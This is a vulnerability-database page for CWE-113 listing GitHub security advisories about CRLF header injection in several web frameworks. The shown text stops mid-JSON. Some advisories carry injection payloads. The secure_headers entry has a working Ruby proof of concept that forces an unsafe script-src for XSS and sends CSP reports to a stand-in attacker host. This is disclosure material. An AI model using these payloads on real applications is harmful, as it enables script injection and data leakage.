CWE-113
AllowedImproper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
Abstraction: Variant · Status: Incomplete
The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
177 vulnerabilities reference this CWE, most recent first.
GHSA-MQH5-C2WX-V3PQ
Vulnerability from github – Published: 2025-01-21 18:31 – Updated: 2025-01-21 18:31Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in Payara Platform Payara Server (Grizzly, REST Management Interface modules), Payara Platform Payara Micro (Grizzly modules) allows Manipulating State, Identity Spoofing.This issue affects Payara Server: from 4.1.151 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0; Payara Micro: from 4.1.152 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0.
{
"affected": [],
"aliases": [
"CVE-2024-45687"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-21T17:15:14Z",
"severity": "LOW"
},
"details": "Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027) vulnerability in Payara Platform Payara Server (Grizzly, REST Management Interface modules), Payara Platform Payara Micro (Grizzly modules) allows Manipulating State, Identity Spoofing.This issue affects Payara Server: from 4.1.151 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0; Payara Micro: from 4.1.152 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0.",
"id": "GHSA-mqh5-c2wx-v3pq",
"modified": "2025-01-21T18:31:07Z",
"published": "2025-01-21T18:31:07Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45687"
},
{
"type": "WEB",
"url": "https://docs.payara.fish/community/docs/6.2025.1/Release%20Notes/Release%20Notes%206.2025.1.html"
},
{
"type": "WEB",
"url": "https://docs.payara.fish/enterprise/docs/5.71.0/Release%20Notes/Release%20Notes%205.71.0.html"
},
{
"type": "WEB",
"url": "https://docs.payara.fish/enterprise/docs/Release%20Notes/Release%20Notes%206.22.0.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-MWCJ-9FQH-RC64
Vulnerability from github – Published: 2022-05-14 02:03 – Updated: 2022-05-14 02:03Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter, a related issue to CVE-2012-2943.
{
"affected": [],
"aliases": [
"CVE-2018-16979"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-12T23:29:00Z",
"severity": "MODERATE"
},
"details": "Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter, a related issue to CVE-2012-2943.",
"id": "GHSA-mwcj-9fqh-rc64",
"modified": "2022-05-14T02:03:03Z",
"published": "2022-05-14T02:03:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16979"
},
{
"type": "WEB",
"url": "https://github.com/howchen/howchen/issues/4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-MWH4-6H8G-PG8W
Vulnerability from github – Published: 2026-04-01 21:48 – Updated: 2026-04-01 21:48Summary
An attacker who controls the reason parameter when creating a Response may be able to inject extra headers or similar exploits.
Impact
In the unlikely situation that an application allows untrusted data to be used in the response's reason parameter, then an attacker could manipulate the response to send something different from what the developer intended.
Patch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34519"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:48:24Z",
"nvd_published_at": "2026-04-01T21:17:00Z",
"severity": "LOW"
},
"details": "### Summary\n\nAn attacker who controls the `reason` parameter when creating a `Response` may be able to inject extra headers or similar exploits.\n\n### Impact\n\nIn the unlikely situation that an application allows untrusted data to be used in the response\u0027s `reason` parameter, then an attacker could manipulate the response to send something different from what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b",
"id": "GHSA-mwh4-6h8g-pg8w",
"modified": "2026-04-01T21:48:24Z",
"published": "2026-04-01T21:48:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34519"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP has HTTP response splitting via \\r in reason phrase"
}
GHSA-PFQJ-W6R6-G86V
Vulnerability from github – Published: 2025-03-27 18:01 – Updated: 2025-03-28 16:12Impact
HTTP Response Header Injection in Pitchfork Versions < 0.11.0 when used in conjunction with Rack 3
Patches
The issue was fixed in Pitchfork release 0.11.0
Workarounds
There are no known work arounds. Users must upgrade.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "pitchfork"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.11.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-30221"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-27T18:01:18Z",
"nvd_published_at": "2025-03-27T15:16:02Z",
"severity": "MODERATE"
},
"details": "### Impact\nHTTP Response Header Injection in Pitchfork Versions \u003c 0.11.0 when used in conjunction with Rack 3\n\n### Patches\nThe issue was fixed in Pitchfork release 0.11.0\n\n### Workarounds\nThere are no known work arounds. Users must upgrade.",
"id": "GHSA-pfqj-w6r6-g86v",
"modified": "2025-03-28T16:12:43Z",
"published": "2025-03-27T18:01:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Shopify/pitchfork/security/advisories/GHSA-pfqj-w6r6-g86v"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30221"
},
{
"type": "WEB",
"url": "https://github.com/Shopify/pitchfork/commit/17ed9b61bf9f58957065f7405b66102daf86bf55"
},
{
"type": "PACKAGE",
"url": "https://github.com/Shopify/pitchfork"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pitchfork/CVE-2025-30221.yml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Pitchfork HTTP Request/Response Splitting vulnerability"
}
GHSA-Q7JX-V53G-848W
Vulnerability from github – Published: 2026-07-10 00:03 – Updated: 2026-07-10 00:03Summary
Tesla.Multipart.add_content_type_param/2 appends caller-supplied strings to the multipart Content-Type header with no validation. A param value containing \r\n splits the header line, allowing an attacker who controls any content-type parameter (charset, boundary parameter, etc.) to inject arbitrary headers into the outbound HTTP request.
Details
add_content_type_param/2 in lib/tesla/multipart.ex stores the supplied string directly in multipart.content_type_params without any CR/LF check. headers/1 then joins all params with "; " and appends the result verbatim to the Content-Type header value. Because HTTP headers are delimited by \r\n, a param containing that sequence breaks out of the header field and introduces new header lines before the adapter writes the request to the socket.
The precondition is that untrusted input reaches add_content_type_param/2, which is the normal pattern for applications that accept user-supplied charset values, file type parameters, or any other content-type extension fields.
PoC
- Call
Tesla.Multipart.add_content_type_param/2with a value containing\r\nX-Injected: pwned. - Pass the resulting
Multipartstruct as the request body via any Tesla adapter. - The raw request on the wire contains
X-Injected: pwnedas a standalone header line.
Impact
Low severity (CVSS v4.0: 2.1). Any application using tesla 0.8.0 through 1.18.2 that passes untrusted input into Tesla.Multipart.add_content_type_param/2 is affected. Consequences range from forging arbitrary outbound request headers to potential request smuggling against the upstream server. Fixed in tesla 1.18.3.
Workarounds
Validate content-type parameter strings before passing them to Tesla.Multipart.add_content_type_param/2, rejecting any value that contains \r or \n.
Reesources
- Introduction commit: https://github.com/elixir-tesla/tesla/commit/6ebfdb9abe9c6f119408045b933d82462decd351
- Patch commit: https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2
{
"affected": [
{
"package": {
"ecosystem": "Hex",
"name": "tesla"
},
"ranges": [
{
"events": [
{
"introduced": "0.8.0"
},
{
"fixed": "1.18.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48596"
],
"database_specific": {
"cwe_ids": [
"CWE-113",
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-10T00:03:12Z",
"nvd_published_at": "2026-06-02T20:16:38Z",
"severity": "LOW"
},
"details": "### Summary\n\n`Tesla.Multipart.add_content_type_param/2` appends caller-supplied strings to the multipart `Content-Type` header with no validation. A param value containing `\\r\\n` splits the header line, allowing an attacker who controls any content-type parameter (charset, boundary parameter, etc.) to inject arbitrary headers into the outbound HTTP request.\n\n### Details\n\n`add_content_type_param/2` in `lib/tesla/multipart.ex` stores the supplied string directly in `multipart.content_type_params` without any CR/LF check. `headers/1` then joins all params with `\"; \"` and appends the result verbatim to the `Content-Type` header value. Because HTTP headers are delimited by `\\r\\n`, a param containing that sequence breaks out of the header field and introduces new header lines before the adapter writes the request to the socket.\n\nThe precondition is that untrusted input reaches `add_content_type_param/2`, which is the normal pattern for applications that accept user-supplied charset values, file type parameters, or any other content-type extension fields.\n\n### PoC\n\n1. Call `Tesla.Multipart.add_content_type_param/2` with a value containing `\\r\\nX-Injected: pwned`.\n2. Pass the resulting `Multipart` struct as the request body via any Tesla adapter.\n3. The raw request on the wire contains `X-Injected: pwned` as a standalone header line.\n\n### Impact\n\nLow severity (CVSS v4.0: 2.1). Any application using `tesla` 0.8.0 through 1.18.2 that passes untrusted input into `Tesla.Multipart.add_content_type_param/2` is affected. Consequences range from forging arbitrary outbound request headers to potential request smuggling against the upstream server. Fixed in tesla 1.18.3.\n\n### Workarounds\n\nValidate content-type parameter strings before passing them to `Tesla.Multipart.add_content_type_param/2`, rejecting any value that contains `\\r` or `\\n`.\n\n### Reesources\n\n* Introduction commit: https://github.com/elixir-tesla/tesla/commit/6ebfdb9abe9c6f119408045b933d82462decd351\n* Patch commit: https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2",
"id": "GHSA-q7jx-v53g-848w",
"modified": "2026-07-10T00:03:12Z",
"published": "2026-07-10T00:03:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/elixir-tesla/tesla/security/advisories/GHSA-q7jx-v53g-848w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48596"
},
{
"type": "WEB",
"url": "https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2"
},
{
"type": "WEB",
"url": "https://cna.erlef.org/cves/CVE-2026-48596.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/elixir-tesla/tesla"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/EEF-CVE-2026-48596"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Tesla has CRLF injection in request `Content-Type` header via `add_content_type_param`"
}
GHSA-QCM3-7879-XCWW
Vulnerability from github – Published: 2024-08-15 21:46 – Updated: 2024-09-30 19:48Impact
Gateway API HTTPRoutes and GRPCRoutes do not follow the match precedence specified in the Gateway API specification. In particular, request headers are matched before request methods, when the specification describes that the request methods must be respected before headers are matched (HTTPRouteRule, GRPCRouteRule).
If users create Gateway API resources that use both request headers and request methods in order to route to different destinations, then traffic may be delivered to the incorrect backend. If the backend does not have Network Policy restricting acceptable traffic to receive, then requests may access information that you did not intend for them to access.
Patches
This issue was fixed in https://github.com/cilium/cilium/pull/34109.
This issue affects: - Cilium v1.15 between v1.15.0 and v1.15.7 inclusive - Cilium v1.16.0
This issue is fixed in: - Cilium v1.15.8 - Cilium v1.16.1
Workarounds
There is no workaround for this issue.
Acknowledgements
The Cilium community has worked together with members of Cure53 and Isovalent to prepare these mitigations. Special thanks to @sayboras for remediating this issue.
Further information
If you have any questions or comments about this advisory, please reach out on Slack.
If you think you have found a vulnerability affecting Cilium, we strongly encourage you to report it to our security mailing list at security@cilium.io. This is a private mailing list for the Cilium security team, and your report will be treated as top priority.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/cilium/cilium"
},
"ranges": [
{
"events": [
{
"introduced": "1.16.0"
},
{
"fixed": "1.16.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"1.16.0"
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/cilium/cilium"
},
"ranges": [
{
"events": [
{
"introduced": "1.15.0"
},
{
"fixed": "1.15.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-42487"
],
"database_specific": {
"cwe_ids": [
"CWE-113",
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-15T21:46:46Z",
"nvd_published_at": "2024-08-15T21:15:16Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nGateway API HTTPRoutes and GRPCRoutes do not follow the match precedence specified in the Gateway API specification. In particular, request headers are matched before request methods, when the specification describes that the request methods must be respected before headers are matched ([HTTPRouteRule](https://gateway-api.sigs.k8s.io/reference/spec/#gateway.networking.k8s.io/v1.HTTPRouteRule), [GRPCRouteRule](https://gateway-api.sigs.k8s.io/reference/spec/#gateway.networking.k8s.io%2fv1.GRPCRouteRule)).\n\nIf users create Gateway API resources that use both request headers and request methods in order to route to different destinations, then traffic may be delivered to the incorrect backend. If the backend does not have Network Policy restricting acceptable traffic to receive, then requests may access information that you did not intend for them to access.\n\n### Patches\n\nThis issue was fixed in https://github.com/cilium/cilium/pull/34109.\n\nThis issue affects:\n- Cilium v1.15 between v1.15.0 and v1.15.7 inclusive\n- Cilium v1.16.0\n\nThis issue is fixed in:\n- Cilium v1.15.8\n- Cilium v1.16.1\n\n### Workarounds\n\nThere is no workaround for this issue.\n\n### Acknowledgements\n\nThe Cilium community has worked together with members of Cure53 and Isovalent to prepare these mitigations. Special thanks to @sayboras for remediating this issue.\n\n### Further information\n\nIf you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack).\n\nIf you think you have found a vulnerability affecting Cilium, we strongly encourage you to report it to our security mailing list at [security@cilium.io](mailto:security@cilium.io). This is a private mailing list for the Cilium security team, and your report will be treated as top priority.\n",
"id": "GHSA-qcm3-7879-xcww",
"modified": "2024-09-30T19:48:17Z",
"published": "2024-08-15T21:46:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/cilium/cilium/security/advisories/GHSA-qcm3-7879-xcww"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42487"
},
{
"type": "WEB",
"url": "https://github.com/cilium/cilium/pull/34109"
},
{
"type": "WEB",
"url": "https://github.com/cilium/cilium/commit/a3510fe4a92305822aa1a5e08cb6d6c873c8699a"
},
{
"type": "WEB",
"url": "https://github.com/cilium/cilium/commit/d88772b9c29e370becbc4547cada6711d51edcde"
},
{
"type": "WEB",
"url": "https://github.com/cilium/cilium/commit/fe42273566a943a0f3174c87b23a195c856b51d6"
},
{
"type": "PACKAGE",
"url": "https://github.com/cilium/cilium"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Gateway API route matching order contradicts specification"
}
GHSA-QPF8-FQRF-8P2H
Vulnerability from github – Published: 2022-05-14 03:56 – Updated: 2025-04-12 13:05CRLF injection vulnerability in the ServerResponse#writeHead function in Node.js 0.10.x before 0.10.47, 0.12.x before 0.12.16, 4.x before 4.6.0, and 6.x before 6.7.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the reason argument.
{
"affected": [],
"aliases": [
"CVE-2016-5325"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-10-10T16:59:00Z",
"severity": "MODERATE"
},
"details": "CRLF injection vulnerability in the ServerResponse#writeHead function in Node.js 0.10.x before 0.10.47, 0.12.x before 0.12.16, 4.x before 4.6.0, and 6.x before 6.7.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the reason argument.",
"id": "GHSA-qpf8-fqrf-8p2h",
"modified": "2025-04-12T13:05:21Z",
"published": "2022-05-14T03:56:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5325"
},
{
"type": "WEB",
"url": "https://github.com/nodejs/node/commit/c0f13e56a20f9bde5a67d873a7f9564487160762"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2016:2101"
},
{
"type": "WEB",
"url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201612-43"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html"
},
{
"type": "WEB",
"url": "http://rhn.redhat.com/errata/RHSA-2017-0002.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/93483"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-QX55-2CP2-7PPQ
Vulnerability from github – Published: 2023-06-07 18:30 – Updated: 2024-04-04 04:39An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2. Open redirection was possible via HTTP response splitting in the NPM package API.
{
"affected": [],
"aliases": [
"CVE-2023-0508"
],
"database_specific": {
"cwe_ids": [
"CWE-113"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-07T17:15:09Z",
"severity": "MODERATE"
},
"details": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2. Open redirection was possible via HTTP response splitting in the NPM package API.",
"id": "GHSA-qx55-2cp2-7ppq",
"modified": "2024-04-04T04:39:35Z",
"published": "2023-06-07T18:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0508"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1842314"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-0508.json"
},
{
"type": "WEB",
"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/389328"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RQQ5-2GF9-4W4Q
Vulnerability from github – Published: 2026-07-10 20:37 – Updated: 2026-07-10 20:37Summary
secure_headers builds the Content-Security-Policy value by stitching every configured directive together with ; separators. Three directive builders (build_sandbox_list_directive, build_media_type_list_directive, build_report_to_directive) interpolate caller-supplied strings into that value without scrubbing ;, \r, or \n.
When an application forwards untrusted input into SecureHeaders.override_content_security_policy_directives (or append_…) for :sandbox, :plugin_types, or :report_to, an attacker can embed a literal ; and inject an arbitrary CSP directive into the header value. Because :sandbox and :plugin_types both sort alphabetically before :script_src in BODY_DIRECTIVES, the injected script-src lands earlier in the header and wins under the CSP first-occurrence rule, defeating the application's real script-src. End result: an 'unsafe-inline' * policy is forced for inline <script> despite the configured strict CSP, giving full XSS reachability anywhere reflected or stored content meets one of these three sinks.
An existing ;/\n scrub is already present in the source-list builder (build_source_list_directive), but the three sibling builders here never received the same treatment and still emit caller bytes verbatim into the CSP value.
Impact
Although piping untrusted input into CSP directives is generally discouraged, applications that do so for one of the three uncovered directives turn that endpoint into an XSS sink with an effective * 'unsafe-inline' script-src, even though the global config says script_src: %w('self'). The same primitive can also be used to point report-to / report-uri at attacker infrastructure to silently siphon CSP violation reports — which include the violated URL, blocked-uri, source-file, line-number and a sample-snippet, useful for fingerprinting and for harvesting victim-internal URLs.
The global default CSP set in Configuration.default is supposed to be a backstop: even if a controller appends a single risky value, the strict script-src should remain the first match. This bug breaks that property by letting the appended value redefine the policy header upstream of the legitimate script-src.
Affected
- Package:
secure_headers(RubyGems) - Vulnerable versions:
<= 7.2.0 - Patched version:
7.3.0
Applications that set :sandbox, :plugin_types, or :report_to only from static configuration (no per-request or per-tenant input) are not exploitable and need only the version bump. Applications that pipe any user-controlled value into one of those three directives via the per-controller override APIs are exploitable and should both upgrade and audit those code paths.
Mitigations / Workarounds
Until upgrading to 7.3.0, sanitize any user-controlled input before passing it to:
SecureHeaders.override_content_security_policy_directivesSecureHeaders.append_content_security_policy_directivesSecureHeaders.use_content_security_policy_named_append
for :sandbox, :plugin_types, or :report_to. Reject or strip ;, \r, and \n from values destined for these directives before they reach the gem.
Vulnerable code
Three sibling builders all join an attacker-controllable value into the CSP header value with no ; / \r / \n scrubbing.
content_security_policy.rb#L72-L93—build_sandbox_list_directive:
elsif sandbox_list && sandbox_list.any?
[
symbol_to_hyphen_case(directive),
sandbox_list.uniq
].join(" ")
end
content_security_policy.rb#L95-L103—build_media_type_list_directive(same pattern, forplugin-types).content_security_policy.rb#L105-L110—build_report_to_directive:
def build_report_to_directive(directive)
return unless endpoint_name = @config.directive_value(directive)
if endpoint_name && endpoint_name.is_a?(String) && !endpoint_name.empty?
[symbol_to_hyphen_case(directive), endpoint_name].join(" ")
end
end
For comparison, content_security_policy.rb#L117-L129 shows the source-list builder that already performs the scrub the three above are missing.
Validation also does not catch it:
policy_management.rb#L361-L371—validate_sandbox_expression!only checksv.start_with?("allow-"), so"allow-scripts allow-same-origin; script-src 'unsafe-inline' *"passes.policy_management.rb#L376-L385—validate_media_type_expression!uses/\A.+\/.+\z/;.matches;and', so"application/x-foo; script-src 'unsafe-inline' *"passes.policy_management.rb#L410-L417—validate_report_to_endpoint_expression!only checksString+ non-empty.
Reachable
The three sinks are reached by the documented public override APIs in lib/secure_headers.rb#L61-L106 — override_content_security_policy_directives, append_content_security_policy_directives, and use_content_security_policy_named_append. These are the documented per-controller hooks Rails apps use to vary CSP per request (e.g. allowing an iframe domain that a user just configured, sandboxing a per-tenant subdocument, or wiring up a per-tenant reporting endpoint).
Concrete reachable shapes:
- Multi-tenant SaaS persisting a tenant-chosen iframe sandbox policy and replaying it via
override_content_security_policy_directives(sandbox: [tenant.sandbox_tokens]). - Document / PDF viewer that allows tenants to whitelist a custom MIME via
plugin_types: [tenant.allowed_mime]. - Reporting integration that lets the operator name the active reporting group through an admin UI and forwards it via
report_to: params[:report_group].
In all three patterns, a string field that the app expects to be a single token (allow-forms, application/pdf, default) is the injection point.
Proof of concept
Pinned reproduction against a minimal Rack app on secure_headers 7.2.0, rack 3.2.6, rackup 2.3.1, webrick 1.9.2. Browser verification uses headless Chromium.
Install (Bundler):
# Gemfile
source "https://rubygems.org"
gem "secure_headers", "= 7.2.0"
gem "rack", "= 3.2.6"
gem "rackup", "= 2.3.1"
gem "webrick", "= 1.9.2"
bundle install
Driver (poc_e2e.rb):
require "rack"
require "webrick"
require "rackup"
require "rackup/handler/webrick"
require "secure_headers"
SecureHeaders::Configuration.default do |c|
c.csp = {default_src: %w('self'), script_src: %w('self'), style_src: %w('self')}
end
INLINE_XSS = "<script>document.body.appendChild(Object.assign(" \
"document.createElement('div'),{id:'pwn',innerText:" \
"'XSS-EXECUTED via '+location.pathname}));</script>"
class App
def call(env)
req = Rack::Request.new(env)
case req.path_info
when "/sandbox" # Vector A
SecureHeaders.override_content_security_policy_directives(req,
sandbox: ["allow-scripts allow-same-origin; script-src 'unsafe-inline' *"])
when "/plugin" # Vector B
SecureHeaders.override_content_security_policy_directives(req,
plugin_types: ["application/x-foo; script-src 'unsafe-inline' *"])
when "/report" # Vector C (report-uri exfil)
SecureHeaders.override_content_security_policy_directives(req,
report_to: "default; report-uri https://attacker.example/leak")
when "/control" # Negative — same payload on a source_list directive
SecureHeaders.override_content_security_policy_directives(req,
frame_src: ["'self'", "evil.example; script-src 'unsafe-inline' *"])
end
body = "<!doctype html>#{INLINE_XSS}"
[200, {"content-type"=>"text/html"}.merge(SecureHeaders.header_hash_for(req)), [body]]
end
end
Rackup::Handler::WEBrick.run(
Rack::Builder.new { use SecureHeaders::Middleware; run App.new },
Host: "127.0.0.1", Port: 14567, AccessLog: [], Logger: WEBrick::Log.new(nil, 0))
Run:
bundle exec ruby poc_e2e.rb
End-to-end reproduction against secure_headers 7.2.0
Server-side observation (curl -s -D - http://127.0.0.1:14567/<path>):
GET /sandbox -> content-security-policy:
default-src 'self'; sandbox allow-scripts allow-same-origin;
script-src 'unsafe-inline' *; script-src 'self'; style-src 'self'
GET /plugin -> content-security-policy:
default-src 'self'; plugin-types application/x-foo;
script-src 'unsafe-inline' *; script-src 'self'; style-src 'self'
GET /report -> content-security-policy:
default-src 'self'; script-src 'self'; style-src 'self';
report-to default; report-uri https://attacker.example/leak
GET /control -> content-security-policy:
default-src 'self'; frame-src 'self' evil.example script-src
'unsafe-inline' *; script-src 'self'; style-src 'self'
Browser verification (headless Chromium, --dump-dom, grep for the injected id="pwn" element which is only present if the inline <script> actually ran):
GET /sandbox -> pwn element PRESENT (XSS executed, injected script-src wins)
GET /plugin -> pwn element PRESENT (XSS executed, injected script-src wins)
GET /report -> pwn element absent (this vector enables report-uri exfil,
not script execution by itself)
GET /control -> pwn element absent (existing scrub on the source-list
builder rewrites ; -> space, so the
legitimate `script-src 'self'` is
still the first match)
Patched-build verification: applying the patch and re-running the same three vectors flips /sandbox and /plugin to "pwn element absent". The injected ; is replaced with a space, so the trailing script-src 'unsafe-inline' * collapses into the parent directive's value list instead of becoming a sibling directive, and the legitimate script-src 'self' stays the first script-src the parser encounters.
Patch
Shipped in 7.3.0 as a private helper that scrubs ;, \r, and \n from every directive value, applied uniformly across the three previously-uncovered builders and the source-list builder.
Sketch of the shipped change in lib/secure_headers/headers/content_security_policy.rb:
DIRECTIVE_INJECTION_REGEX = /[\n\r;]/.freeze
def scrub_directive_value(directive, value)
str = value.to_s
if str =~ DIRECTIVE_INJECTION_REGEX
Kernel.warn("#{directive} contains a #{$~[0].inspect} in #{str.inspect} which will raise an error in future versions. It has been replaced with a blank space.")
str.gsub(DIRECTIVE_INJECTION_REGEX, " ")
else
str
end
end
The helper is invoked from each builder against the joined directive value (not per-token), so a single Kernel.warn is emitted per directive regardless of how many offending bytes the input contains. The same helper now also wraps the existing source-list scrub.
See the merged fix PR for the full patch and tests.
Credit
Reported by @tonghuaroot.
Resources
- CVE-2020-5217 — prior
secure_headersadvisory for the same bug class onbuild_source_list_directive(the 2020 fix that motivated the helper this advisory extends). - W3C CSP Level 3 — Parse a serialized CSP — defines the first-occurrence rule that makes the alphabetical-ordering exploit work.
- RFC 7230 §3.2.4 — Field parsing — context for why bare
\r/\nin HTTP header values are unsafe regardless of directive separator semantics.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "secure_headers"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54163"
],
"database_specific": {
"cwe_ids": [
"CWE-113",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-10T20:37:15Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
